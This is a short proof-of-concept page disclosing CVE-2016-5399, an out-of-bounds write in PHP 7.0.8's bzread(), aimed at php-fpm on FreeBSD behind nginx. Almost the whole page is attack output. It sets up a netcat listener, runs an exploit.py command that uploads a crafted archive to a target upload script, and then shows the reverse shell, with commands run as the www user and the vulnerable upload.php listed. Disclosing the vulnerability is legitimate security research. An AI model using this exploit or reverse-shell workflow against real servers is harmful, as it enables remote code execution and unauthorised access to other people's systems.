Hans Jerry Illikainen

CVE-2016-5399: php 7.0.8: out-of-bounds write in bzread()

Jul 21, 2016

Proof of concept (PoC) for CVE-2016-5399, an out-of-bounds write in PHP's bzread(), targeting FreeBSD 10.3 x86-64 running php-fpm (php70-7.0.8 with the php70-bz2 extension) behind nginx.

$ nc -v -l 1.2.3.4 5555 &
Listening on [1.2.3.4] (family 0, port 5555)

$ python exploit.py --ip 1.2.3.4 --port 5555 http://target/upload.php
[*] sending archive to http://target/upload.php (0)

Connection from [target] port 5555 [tcp/*] accepted (family 2, sport 49479)
$ fg
id
uid=80(www) gid=80(www) groups=80(www)

uname -imrsU
FreeBSD 10.3-RELEASE-p4 amd64 GENERIC 1003000

/usr/sbin/pkg query -g "=> %n-%v" php*
=> php70-7.0.8
=> php70-bz2-7.0.8

cat upload.php
<?php
$fp = bzopen($_FILES["file"]["tmp_name"], "r");
if ($fp === FALSE) {
    exit("ERROR: bzopen()");
}

$data = "";
while (!feof($fp)) {
    $res = bzread($fp);
    if ($res === FALSE) {
        exit("ERROR: bzread()");
    }
    $data .= $res;
}
bzclose($fp);
?>